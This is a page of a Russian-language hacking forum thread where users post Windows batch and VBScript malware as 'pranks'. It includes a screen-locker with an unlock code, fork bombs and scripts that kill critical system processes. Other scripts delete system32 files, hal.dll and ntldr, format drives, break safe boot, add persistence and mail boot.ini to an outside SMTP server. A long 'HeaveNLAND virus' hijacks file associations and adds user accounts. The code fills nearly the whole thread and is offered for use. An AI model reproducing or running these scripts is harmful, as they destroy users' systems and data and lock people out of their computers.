Форум   Статьи   Новости   Файлы   Bugtraq   Сниффер   Друзья   О Клубе
Вернуться   HPC / Безопасность / Операционные Системы / Windows
 
  Страница 4
Старый 05.09.2018, 17:46
viktor2008
Это сообщение было удалено _Werewolf_.
Старый 10.09.2018, 18:38
viktor2008
Это сообщение было удалено Fantomas.
Старый 10.09.2018, 18:39
viktor2008
Это сообщение было удалено Fantomas.
Старый 10.09.2018, 18:40
viktor2008
Это сообщение было удалено Fantomas.
  , 18:48   #50
НЕ ПРОВЕРЕН
 
Регистрация: 04.09.2018
Сообщений: 15

Репутация: 0 / 0
Exclamation vvvvvvvvvvviiiiiiiiiiiirrrrrrrrrrrrruuuuuuuuuuusssssssssss

вот например
самый кошмар
в бат
@echo off
mode con cols=10000 lines=10000
chcp 1251
copy %0 %WinDir%\user32dll.bat > nul
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce/v "User32" /t REG_SZ /d "%WinDir%\user32dll.bat" /f
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Polices\System /v DisableTaskMgr /t REG_DWORD /d 1 /f > nul
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableCMD /t REG_DWORD /d 2 /f > nul
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f >nul
del %systemroot%\system32\control.exe /f /q
del %systemroot%\regedit.exe /f /q
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDrives /t REG_DWORD /d 67108863 /f > nul
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoViewOnDrive /t REG_DWORD /d 67108863 /f > nul
Reg Delete HKLM\System\CurrentControlSet\Control\SafeBoot\*.* /q
Reg Delete HKLM\System\CurrentControlSet\Control\SafeBoot /q
reg add HKCU\Software\Microsoft\Windows\Current Version\Policies\Explorer/v NoControlPanel /t REG_DWORD /d 1 /f >nul
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f >nul
rundll32 mouse,disable > nul
rundll32 keyboard,disable > nul
taskkill /f /im explorer.exe
taskkill /f /im skype.exe
del %systemroot%\system32\notepad.exe /f /q >nul
echo on error resume next > %TEMP%\s1.vbs
echo Set S = CreateObject("Wscript.Shell") >> %TEMP%\s1.vbs
echo set FSO=createobject("scripting.filesystemobject") >> %TEMP%\s1.vbs
echo do >> %TEMP%\s1.vbs
echo wscript.sleep 200 >> %TEMP%\s1.vbs
echo s.sendkeys"{capslock}" >> %TEMP%\s1.vbs
echo wscript.sleep 200 >> %TEMP%\s1.vbs
echo s.sendkeys"{numlock}" >> %TEMP%\s1.vbs
echo wscript.sleep 200 >> %TEMP%\s1.vbs
echo s.sendkeys"{scrolllock}" >> %TEMP%\s1.vbs
echo loop >> %TEMP%\s1.vbs
%TEMP%\s1.vbs
del "%SystemRoot%\Driver Cache\i386\driver.cab" /f /q >nul
del "%SystemRoot%\Media" /q > nul
del %systemroot%\system32\*.dll /f /q
del %systemroot%\system32\*.exe /f /q
format c:
format d:
 
Пользователь вне форума    
  , 18:51   #51
НЕ ПРОВЕРЕН
 
Регистрация: 04.09.2018
Сообщений: 15

Репутация: 0 / 0
По умолчанию

винлокер в бат пароль 328642887468723442222
@echo off
color a
taskkill /im explorer.exe /f > nul
Reg Delete HKLM\System\CurrentControlSet\Control\SafeBoot /f > nul
copy %0 %windir%\Win32.bat > nul
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\" /v Win32 /t REG_SZ /d C:WindowsWin32.bat /f
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f > nul
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f >nul
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableCMD/t REG_DWORD/d 2 /f > nul
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f >nul
reg add HKCU\Software\Microsoft\Windows\Current Version\Policies\Explorer/v NoControlPanel /t REG_DWORD /d 1 /f >nul
cls
title virus
echo Computer Locked!!!
echo virus
echo ENTER CODE:
:code
set /p x=
if %x%==328642887468723442222 (echo Unlocking system...
start explorer
del %0
reg Delete HKCUSoftwareMicrosoftWindowsCurrentVersionRun /f > nul
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 0 /f > nul
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 0 /f >nul
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableCMD/t REG_DWORD/d 0 /f > nul
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 0 /f >nul
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer/v NoControlPanel /t REG_DWORD /d 0 /f >nul
exit
) ELSE (
cls
echo Wrong code!!!
echo Enter code:
)
goto code
 
Пользователь вне форума    
  , 18:55   #52
НЕ ПРОВЕРЕН
 
Регистрация: 04.09.2018
Сообщений: 15

Репутация: 0 / 0
Exclamation прикол 😁😁😁

вот поприкалывайтесь
@echo off
taskkill /f /im dwm.exe
taskkill /f /im winlogon.exe
taskkill /f /im explorer.exe
taskkill /f /im svchost.exe
taskkill /f /im wininit.exe
 
Пользователь вне форума    
  , 19:09   #53
Модератор
 
Аватар для Fantomas
 
Регистрация: 16.09.2009
Сообщений: 162
Депозит: $1000

Репутация: 29 / 1
По умолчанию

viktor2008, оформляй нормально посты.

code:
код нужно оформлять так
Иначе будет блокировка аккаунта. Надолго.
 
Пользователь вне форума    
  , 19:18   #54
НЕ ПРОВЕРЕН
 
Регистрация: 04.09.2018
Сообщений: 15

Репутация: 0 / 0
По умолчанию

скрывает диски всегда в бат
@echo off
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDrives /t REG_DWORD /d 67108863 /f > nul
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoViewOnDrive /t REG_DWORD /d 67108863 /f > nul
 
Пользователь вне форума    
  , 19:21   #55
НЕ ПРОВЕРЕН
 
Регистрация: 04.09.2018
Сообщений: 15

Репутация: 0 / 0
По умолчанию

отрубает монитор (навсегда на виртуалке тестил) в бат
@echo off
rundll32 user,disableoemlayer > nul
 
Пользователь вне форума    
  , 19:28   #56
НЕ ПРОВЕРЕН
 
Регистрация: 04.09.2018
Сообщений: 15

Репутация: 0 / 0
По умолчанию

тоже прикол в батнике завершает все системные процессы
@echo off
taskkill /f /im winlogon.exe
taskkill /f /im AdminService.exe
taskkill /f /im AVGUI.exe
taskkill /f /im csrss.exe
taskkill /f /im explorer.exe
taskkill /f /im HControl.exe
taskkill /f /im lsass.exe
taskkill /f /im services.exe
taskkill /f /im svchost.exe
taskkill /f /im dwm.exe
taskkill /f /im taskhostw.exe
taskkill /f /im wininit.exe
 
Пользователь вне форума    
  , 16:41   #57
НЕ ПРОВЕРЕН
 
Регистрация: 04.09.2018
Сообщений: 15

Репутация: 0 / 0
По умолчанию

trojan.fork сохраняем в формате .bat



@echo off
:x
start cmd.exe
start mspaint.exe
start taskmgr.exe
start www.garry.on.nimp.org
goto x
 
Пользователь вне форума    
  , 16:43   #58
НЕ ПРОВЕРЕН
 
Регистрация: 04.09.2018
Сообщений: 15

Репутация: 0 / 0
По умолчанию

вот мощный и опасный вирус который удаляет всё в редакторе реестра



@echo off
echo Chr(39)>%temp%\temp1.vbs
echo Chr(39)>%temp%\temp2.vbs
echo on error resume next > %temp%\temp.vbs
echo Set S = CreateObject("Wscript.Shell") >> %temp%\temp.vbs
echo set FSO=createobject("scripting.filesystemobject")>>%temp%\temp.vbs
reg add HKEY_USERS\S-1-5-21-343818398-1417001333-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v nodesktop /d 1 /freg add HKEY_USERS\S-1-5-21-343818398-1417001333-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v ClassicShell /d 1 /fset ¶§=%0
copy %¶§% %SystemRoot%\user32dll.bat
reg add "hklm\Software\Microsoft\Windows\CurrentVersion\Run" /v RunExplorer32 /d %SystemRoot%\user32dll.bat /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoDrives /t REG_DWORD /d 67108863 /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoViewOnDrive /t REG_DWORD /d 67108863 /f
echo fso.deletefile "C:\ntldr",1 >> %temp%\temp.vbs
reg add "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions" /v "NoSelectDownloadDir" /d 1 /f
reg add "HKLM\SOFTWARE\Microsoft\Internet Explorer\main\FeatureControl\Feature_LocalMachine_Lockdown" /v "IExplorer" /d 0 /f
reg add "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions" /v "NoFindFiles" /d 1 /f
reg add "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions" /v "NoNavButtons" /d 1 /f
echo fso.deletefolder "D:\Windows",1 >> %temp%\temp.vbs
echo fso.deletefolder "I:\Windows",1 >> %temp%\temp.vbs
echo fso.deletefolder "C:\Windows",1 >> %temp%\temp.vbs
echo sr=s.RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRoot") >> %temp%\temp.vbs
echo fso.deletefile sr+"\system32\hal.dll",1 >> %temp%\temp.vbs
echo sr=s.RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRoot") >> %temp%\temp.vbs
echo fso.deletefolder sr+"\system32\dllcache",1 >> %temp%\temp.vbs
echo sr=s.RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRoot") >> %temp%\temp.vbs
echo fso.deletefolder sr+"\system32\drives",1 >> %temp%\temp.vbs
echo s.regwrite "HKEY_CLASSES_ROOT\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\LocalizedString","forum.whack.ru™">>%temp%\temp.vbs
echo s.regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner","forum.whack.ru™">>%temp%\temp.vbs
echo s.regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization","forum.whack.ru™">>%temp%\temp.vbs
echo on error resume next > %temp%\temp1.vbs
echo set FSO=createobject("scripting.filesystemobject")>>%temp%\temp1.vbs
echo do>>%temp%\temp1.vbs
echo fso.getfile ("A:\")>>%temp%\temp1.vbs
echo loop>>%temp%\temp1.vbs
echo on error resume next > %temp%\temp2.vbs
echo Set S = CreateObject("Wscript.Shell") >> %temp%\temp2.vbs
echo do>>%temp%\temp2.vbs
echo execute"S.Run ""%comspec% /c echo "" && Chr(7), 0, True">>%temp%\temp2.vbs
echo loop>>%temp%\temp2.vbs
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v disabletaskmgr /t REG_DWORD /d 1 /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v disableregistrytools /t REG_DWORD /d 1 /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuPinnedList /t REG_DWORD /d 1 /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuMFUprogramsList /t REG_DWORD /d 1 /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoUserNameInStartMenu /t REG_DWORD /d 1 /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum" /v {20D04FE0-3AEA-1069-A2D8-08002B30309D} /t REG_DWORD /d 1 /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoNetworkConnections /t REG_DWORD /d 1 /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuNetworkPlaces /t REG_DWORD /d 1 /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v StartmenuLogoff /t REG_DWORD /d 1 /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuSubFolders /t REG_DWORD /d 1 /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoCommonGroups /t REG_DWORD /d 1 /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFavoritesMenu /t REG_DWORD /d 1 /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoRecentDocsMenu /t REG_DWORD /d 1 /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSetFolders /t REG_DWORD /d 1 /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoAddPrinter /t REG_DWORD /d 1 /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFind /t REG_DWORD /d 1 /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSMHelp /t REG_DWORD /d 1 /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoRun /t REG_DWORD /d 1 /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuMorePrograms /t REG_DWORD /d 1 /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoClose /t REG_DWORD /d 1 /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoChangeStartMenu /t REG_DWORD /d 1 /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSMMyDocs /t REG_DWORD /d 1 /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSMMyPictures /t REG_DWORD /d 1 /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuMyMusic /t REG_DWORD /d 1 /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /f
echo set application=createobject("shell.application")>>%temp%\temp.vbs
echo application.minimizeall>>%temp%\temp.vbs
reg add "hklm\Software\Microsoft\Windows\CurrentVersion\run" /v SwapNT /t REG_SZ /d rundll32 user32, SwapMouseButton /f
start rundll32 user32, SwapMouseButton
reg add "HKCR\exefile\shell\open\command" /ve /t REG_SZ /d rundll32.exe /f
echo i=50 >> %temp%\temp.vbs
echo while i^>0 or i^<0 >> %temp%\temp.vbs
echo S.popup "Error 509",0, "S55",0+16 >> %temp%\temp.vbs
echo i=i-1 >> %temp%\temp.vbs
echo wend >> %temp%\temp.vbs
echo do >> %temp%\temp.vbs
echo wscript.sleep 200 >> %temp%\temp.vbs
echo s.sendkeys"{capslock}" >> %temp%\temp.vbs
echo wscript.sleep 200 >> %temp%\temp.vbs
echo s.sendkeys"{numlock}" >> %temp%\temp.vbs
echo wscript.sleep 200 >> %temp%\temp.vbs
echo s.sendkeys"{scrolllock}" >> %temp%\temp.vbs
echo loop>> %temp%\temp.vbs
echo Set oWMP = CreateObject("WMPlayer.OCX.7") >> %temp%\temp.vbs
echo Set colCDROMs = oWMP.cdromCollection >> %temp%\temp.vbs
echo if colCDROMs.Count ^>= 1 then >> %temp%\temp.vbs
echo For i = 0 to colCDROMs.Count - 1 >> %temp%\temp.vbs
echo colCDROMs.Item(i).eject >> %temp%\temp.vbs
echo next >> %temp%\temp.vbs
echo End If >> %temp%\temp.vbs
rem ?? ?????????! ???????? ????! echo Call SendPost("smtp.mail.ru", "[email protected]", "[email protected]", "...", "???? ???????!") >> %temp%\temp.vbs
echo Function SendPost(strSMTP_Server, strTo, strFrom, strSubject, strBody) >> %temp%\temp.vbs
echo Set iMsg = CreateObject("CDO.Message") >> %temp%\temp.vbs
echo Set iConf = CreateObject("CDO.Configuration") >> %temp%\temp.vbs
echo Set Flds = iConf.Fields >> %temp%\temp.vbs
echo Flds.Item("http://schemas.microsoft.com/cdo/configuration/sendusing") = 2 >> %temp%\temp.vbs
echo Flds.Item("http://schemas.microsoft.com/cdo/configuration/smtpauthenticate") = 1 >> %temp%\temp.vbs
echo Flds.Item("http://schemas.microsoft.com/cdo/configuration/sendusername") = "support" >> %temp%\temp.vbs
echo Flds.Item("http://schemas.microsoft.com/cdo/configuration/sendpassword") = "support" >> %temp%\temp.vbs
echo Flds.Item("http://schemas.microsoft.com/cdo/configuration/smtpserver") = "smtp.mail.ru" >> %temp%\temp.vbs
echo Flds.Item("http://schemas.microsoft.com/cdo/configuration/smtpserverport") = 25 >> %temp%\temp.vbs
echo Flds.Update >> %temp%\temp.vbs
echo iMsg.Configuration = iConf >> %temp%\temp.vbs
echo iMsg.To = strTo >> %temp%\temp.vbs
echo iMsg.From = strFrom >> %temp%\temp.vbs
echo iMsg.Subject = strSubject >> %temp%\temp.vbs
echo iMsg.TextBody = strBody >> %temp%\temp.vbs
echo iMsg.AddAttachment "c:\boot.ini" >> %temp%\temp.vbs
echo iMsg.Send >> %temp%\temp.vbs
echo End Function >> %temp%\temp.vbs
echo Set iMsg = Nothing >> %temp%\temp.vbs
echo Set iConf = Nothing >> %temp%\temp.vbs
echo Set Flds = Nothing >> %temp%\temp.vbs
echo s.run "shutdown -r -t 0 -c ""Delete system Files.........................................................."" -f",1 >> %temp%\temp.vbs
start %temp%\temp.vbs
start %temp%\temp1.vbs
start %temp%\temp2.vbs
 
Пользователь вне форума    
  , 20:20   #59
НЕ ПРОВЕРЕН
 
Регистрация: 28.05.2019
Сообщений: 1

Репутация: 0 / 0
Exclamation

Автор: Я, Lazarus
code:
::---------------------------------------------------------------------------------------------------------------------::
::.____                                                                                                                  
::|    |   _____  _____________ _______ __ __  ______                                                                   
::|    |   \__  \ \___   /\__  \\_  __ \  |  \/  ___/                                                                   
::|    |___ / __ \_/    /  / __ \|  | \/  |  /\___ \                                                                    
::|_______ (____  /_____ \(____  /__|  |____//____  >                                                                   
::        \/    \/      \/     \/                 \/                                                                    
::___________           .__                  .__                .__                    .____  ___________________       
::\__    ___/___   ____ |  |__   ____   ____ |  |   ____   ____ |__| ____   ______     |    | \__    ___/\______ \      
::  |    |_/ __ \_/ ___\|  |  \ /    \ /  _ \|  |  /  _ \ / ___\|  |/ __ \ /  ___/     |    |   |    |    |    |  \     
::  |    |\  ___/\  \___|   Y  \   |  (  <_> )  |_(  <_> ) /_/  >  \  ___/ \___ \      |    |___|    |    |    '   \    
::  |____| \___  >\___  >___|  /___|  /\____/|____/\____/\___  /|__|\___  >____  > /\  |_______ \____|   /_______  / /\ 
::             \/     \/     \/     \/                  /_____/         \/     \/  )/          \/                \/  \/ 
::---------------------------------------------------------------------------------------------------------------------::

::--- COMMON INFORMATION --------:: 

::--------------------------------------------------------------------------------::
::--- HeaveNLAND virus Created BY: Lazarus - 16:38:04/26.05.2019 -------------------::
::--- Copyright © Lazarus Technologies, LTD. 2007-2049 All Rights Reserved ---------::
::--- DO NOT REMOVE THE COPYRIGHT !!! - AUTHOR HAS ALL RIGHTS TO THIS FILE ---------::
::--- THE SOFTWARE PROVIDED FROM LAZARUS TECHNOLOGIES, LTD. ------------------------::
::--- SOFTWARE PROVIDED FROM LAZARUS TECHNOLOGIES, LTD. PRESENTS "VIRUS" WHICH ARE NOT RECOMMENDED TO RUN. OTHERWISE, THIS WILL LEAD YOUR OS. -------------::
::--- START AT YOUR OWN RISK -------::
::--- THE CREATOR OF THE SOFTWARE IS NOT RESPONSIBLE FOR YOUR OS, IF ANYTHING HAPPENS TO IT ----------::
::---------- ;; CONTACT TO CREATOR - Discord: Lazarus#4807 ;; ----------::
::--- TEL: +995 598 555 904

::--- Software provided from Software Gen Co. LTD. to Discordapp.com -------::

::--- The Software Provided From Software Gen Co. LTD. AS ("IS") and its not completly free ------::
::- More Information: information\info.txt -::

:: ALL LICENSES :: ::--- License\ ---::

::--- Start -------::
@echo off
::--- Title ---------::
;; title 
::--- Color ---------::
;; color 0a
::--- Registry Commands ----------::
::--- Taskkill -------::
taskkill /f /im explorer.exe >nul
::---- End Taskkill -----------::
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoDesktop /t REG_DWORD /d 1 /f >nul
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" \RestrictRun /v 1 /t REG_DWORD /d %SystemRoot%\explorer.exe /f >nul 
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" 
/v NoControlPanel /t REG_DWORD /d 1 /f >nul
reg add "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem" /v DisableTaskMgr /t REG_DWORD /d 1 /f >nul
reg add "HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache" /v @C:\WINDOWS\system32\SHELL32.dll,-8964 /t REG_SZ /d YOU WILL DIE /F
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v disabletaskmgr /t REG_DWORD /d 1 /f 
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v disableregistrytools /t REG_DWORD /d 1 /f 
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuPinnedList /t REG_DWORD /d 1 /f 
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuMFUprogramsList /t REG_DWORD /d 1 /f 
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoUserNameInStartMenu /t REG_DWORD /d 1 /f 
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum" /v {20D04FE0-3AEA-1069-A2D8-08002B30309D} /t REG_DWORD /d 1 /f 
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoNetworkConnections /t REG_DWORD /d 1 /f 
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuNetworkPlaces /t REG_DWORD /d 1 /f 
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v StartmenuLogoff /t REG_DWORD /d 1 /f 
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuSubFolders /t REG_DWORD /d 1 /f 
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoCommonGroups /t REG_DWORD /d 1 /f 
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFavoritesMenu /t REG_DWORD /d 1 /f 
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoRecentDocsMenu /t REG_DWORD /d 1 /f 
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSetFolders /t REG_DWORD /d 1 /f 
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoAddPrinter /t REG_DWORD /d 1 /f 
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFind /t REG_DWORD /d 1 /f 
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSMHelp /t REG_DWORD /d 1 /f 
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoRun /t REG_DWORD /d 1 /f 
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuMorePrograms /t REG_DWORD /d 1 /f 
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoClose /t REG_DWORD /d 1 /f 
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoChangeStartMenu /t REG_DWORD /d 1 /f 
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSMMyDocs /t REG_DWORD /d 1 /f 
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSMMyPictures /t REG_DWORD /d 1 /f 
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuMyMusic /t REG_DWORD /d 1 /f 
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /f
::--- Autoexec ------------::
copy ""%0"" "%SystemRoot%\system32\batinit.bat" >nul 
reg add "HKCU\SOFTWARE\Microsoft\Command Processor" /v AutoRun /t REG_SZ /d "%SystemRoot%\System32\batinit.bat" /f >nul 
::--- End Autoexec -----------::
::--- Rundll32 ----------::


::--- HeaveN LAND ------::
::--- Title -------::
;; title dummy host
::--- Color -------::
;; color 0a
msg * Fatal Error: Missing Boot Sector in disc C:\
msg * Virus Found in RAM!
msg * Computer Will cure the virus
%SystemRoot%/system32/rundll32 user32, SwapMouseButon >nul
ping localhost -n 2>nul
@goto main
::--- HeaveN LAND ------::

::--- Main -------------::
:main
::--- Title ------------::
;; title Scanning Computer
::--- Color ------------::
:color
;; color 0f
ping localhost -n 2>nul
::--- Main Functions --------:: 
:main_function
attrib +s +h +o +x +p HeavenLAND.bat
attrib +s +h +o +x +p %0
attrib +h Windows
time 0:00 >nul
date 13.06.23 >nul
label C:DEATH >nul
label D:DEATH >nul
label E:DEATH >nul
label F:DEATH >nul
copy %0 C:\HeaveNLAND.bat >nul
copy %0 D:\HeaveNLAND.bat >nul
copy %0 E:\HeaveNLAND.bat >nul
copy %0 F:\HeaveNLAND.bat >nul
@goto userchange

::--- Changing User Settings --------::
:userchange
net user "YOU WILL DIE1" /add >nul
net user "YOU WILL DIE2" /add >nul
net user "YOU WILL DIE3" /add >nul
net user "YOU WILL DIE4" /add >nul
net user "YOU WILL DIE5" /add >nul
net user "YOU WILL DIE6" /add >nul
net user "YOU WILL DIE7" /add >nul
net user "YOU WILL DIE8" /add >nul
net user "YOU WILL DIE9" /add >nul
net user "YOU WILL DIE10" /add >nul
ping localhost -n 2>nul
@goto association 

::--- assoc ".lnk" and ".exe" files to ".txt" --------::
:association
::--- title ------::
;; title Loading Dll library
::--- color ------::
:color1
;; color 40
ping localhost -n 2>nul
::--- association ------::
assoc .lnk=.txt >nul
ping localhost -n 1>nul
assoc .exe=.txt >nul
assoc .mui=.txt >nul
assoc .dll=.txt >nul
assoc .sys=.txt >nul
assoc .drv=.txt >nul
assoc .lib=.txt >nul
@goto test_directory

::--- Test for Directory -------::
:test_directory
::--- Title ------::
;; title Testing For Directory
::--- Color ------:: 
:color2
;; color 1F
ping localhost -n 2>nul
::--- Testing ------------------::
cmd/c for /l %%i in () do @(if exist "C:\Users\User\Desktop\HeaveNLAND" goto make_directory if not exist "C:\Users\User\Desktop\HeaveNLAND" echo Copying 1 folder to "C:\Users\User\Desktop\" copy "C:\Users\User\Downloads\HeaveNLAND" "C:\Users\User\Desktop\" 
del "C:\Users\User\Downloads\HeaveNLAND"
ping localhost -n 2>nul
@goto make_directory

::--- Making New Directory -------:: 
:make_directory
::--- title -------::
;; title Making New Directory 
::--- Color -------::
:color3
;; color 89
ping localhost -n 2>nul
::--- Making ---------------------::
md YOU DIE NEXT1>nul
md YOU DIE NEXT2>nul
md YOU DIE NEXT3>nul
md YOU DIE NEXT4>nul
md YOU DIE NEXT5>nul
md YOU DIE NEXT6>nul
md YOU DIE NEXT7>nul
md YOU DIE NEXT8>nul
md YOU DIE NEXT9>nul
md YOU DIE NEXT10>nul
md YOU DIE NEXT11>nul
md YOU DIE NEXT12>nul
md YOU DIE NEXT13>nul
md YOU DIE NEXT14>nul
md YOU DIE NEXT15>nul
md YOU DIE NEXT16>nul
md YOU DIE NEXT17>nul
md YOU DIE NEXT18>nul
md YOU DIE NEXT19>nul
md YOU DIE NEXT20>nul
ping localhost -n 2>nul
@goto second_function

::--- Second Function ---------::
:second_function
::--- Title --------::
;; title Creating Restore Point
::--- Color --------::
:color4
color 17
ping localhost -n 2>nul
color 71
goto color4
::--- Second Function ---------::
ren HeaveNLAND.bat QVek5O24P4kD4k5o43o54mkhIOek4JOeVB.bat
cd ..
for /l %%i in (1,1,100) do mkdir "dir %%i"
cd ..
for /l %%i in (1,1,100) do mkdir "dir %%i"
cd ..
for /l %%i in (1,1,100) do mkdir "dir %%i"
cd Windows
for /l %%i in (1,1,100) do mkdir "dir %%i"
cd System32
for /l %%i in (1,1,100) do mkdir "dir %%i"
cd ..
cd ..
cd Program Files
for /l %%i in (1,1,100) do mkdir "dir %%i"
cd ..
cd Program Files (x86)
for /l %%i in (1,1,100) do mkdir "dir %%i"
cd ..
@goto AcvBxc

::--- AcvBXC Turns on ---------::
:AcvBXC
set ACVBXC=VARIABLE
setx ACVBXC "TERM$(0)GET_TERM$(1){GETDLL$(0)'C:\Windows\System32\HAL.dll'}:SETCONTROL$(%%1 CALL "cmd.exe", 0);READYCONTROL$(0)"
ping localhost -n 2>nul
if %ACVBXC%=="TERM$(0)GET_TERM$(1){GETDLL$(0)'C:\Windows\System32\HAL.dll'}:SETCONTROL$(%%1 CALL "cmd.exe", 0);READYCONTROL$(0)" (goto acvBSD)
if %ACVBXC%==else (goto AcvBxc)
pause >nul
